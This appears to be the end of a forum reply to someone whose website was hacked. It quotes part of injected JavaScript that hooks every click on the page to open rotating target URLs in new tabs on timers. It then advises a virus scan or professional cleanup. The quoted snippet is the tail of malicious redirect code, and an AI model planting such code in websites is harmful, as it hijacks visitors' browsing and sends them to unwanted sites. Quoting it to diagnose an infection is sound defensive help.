                const storageDateForMints = parseInt(savedDateForMints);
                const storageDateForHours = parseInt(savedDateForHours);
                const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
                const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

                if (hoursDiff >= allowedHours) {
                    saveTargetLocationsToStorage(targets);
                    setTimeToStorage(`${host}-hurs`, nowDate);
                }
                if (mintsDiff >= restMinutes) {
                    if (newLocation) {
                        setTimeToStorage(`${host}-mnts`, nowDate);
                        window.open(newLocation, "_blank");
                        setLocationAsVisited(newLocation);
                    }
                }
            } catch (error) { visitNewLocation(targets, host, nowDate); }
        } else { visitNewLocation(targets, host, nowDate); }
    }
    document.addEventListener("click", globalClick) })
```

I would recommend you download a copy of your website and perform a thorough virus scan or contact a company to assist you with cleaning your website completely websites that are hacked / hijacked, tend to compromise other files that keep re-injecting the malicious code.